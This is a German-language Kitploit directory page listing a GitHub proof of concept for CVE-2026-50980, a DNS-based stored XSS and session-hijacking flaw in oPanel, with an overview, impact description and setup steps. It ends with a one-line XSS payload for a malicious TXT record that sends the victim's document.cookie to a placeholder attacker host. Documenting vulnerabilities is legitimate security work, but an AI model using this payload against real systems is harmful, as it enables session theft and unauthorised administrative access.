Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-50980 — oPanel DNS-basiertes Cross-Site Scripting (XSS) & Session-Hijacking | Kitploit
Tools/GitHubGitHub/bugresearch/cve-2026-50980
SchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitDNS-Analyse
GitHubbugresearch/cve-2026-50980

CVE-2026-50980

oPanel DNS-basiertes Cross-Site Scripting (XSS) & Session-Hijacking

Repository anzeigen
vor 1 MonatNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-50980: DNS-basierte Cross-Site-Scripting (XSS) & Session Hijacking in oPanel

Übersicht

  • CVE-ID: CVE-2026-50980
  • Produkt: oPanel
  • Betroffene Versionen: < v1.20.25
  • Schwachstellentyp: Stored Cross-Site-Scripting (XSS) über DNS / Session Hijacking
  • Schweregrad: Hoch (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N)

Beschreibung

Eine Cross-Site-Scripting (XSS)-Schwachstelle existiert in oPanel (Versionen vor v1.20.25) aufgrund der unsachgemäßen Handhabung und Bereinigung von DNS-Antworten. Wenn das Panel eine DNS-Abfrage durchführt (z. B. zum Abrufen von Domain-Informationen, zur Überprüfung der DNS-Propagation oder zum Abfragen von TXT-Einträgen) gegen einen vom Angreifer kontrollierten Nameserver, spiegelt es die zurückgegebenen DNS-Einträge direkt in die Weboberfläche, ohne ausreichende HTML-Kodierung durchzuführen.

Ein Angreifer kann dies ausnutzen, indem er einen bösartigen DNS-Server so konfiguriert, dass er auf TXT-Abfragen mit einer schädlichen JavaScript-Nutzlast antwortet. Wenn ein authentifizierter oPanel-Benutzer (z. B. ein Administrator) die Seite aufruft, auf der die DNS-Antwort angezeigt wird, wird die Nutzlast im Kontext seiner Browsersitzung ausgeführt.

Auswirkungen

Eine erfolgreiche Ausnutzung ermöglicht es einem Angreifer, beliebiges JavaScript im Browser des Opfers auszuführen. Wie im Proof of Concept gezeigt, kann dies ausgenutzt werden, um sensible Authentifizierungs-Cookies (document.cookie) zu stehlen, was zu vollständigem Session Hijacking und unbefugtem administrativem Zugriff auf die oPanel-Umgebung führt.

Proof of Concept (PoC)

Die Ausnutzung erfordert, dass der Angreifer einen bösartigen DNS-Server und einen HTTP-Listener einrichtet, um die exfiltrierten Daten zu erfassen.

1. Einrichtung der Angreifer-Infrastruktur

Der Angreifer führt einen bösartigen DNS-Server auf UDP-Port 53 aus, der so konfiguriert ist, dass er auf jede TXT-Abfrage mit einer XSS-Nutzlast antwortet.

Bösartiger TXT-Eintrag (Payload):

root@kitploit:~
<script>new Image().src='http://<ATTACKER_IP>:<HTTP_PORT>/log?cookie='+document.cookie;</script>
Tool herunterladen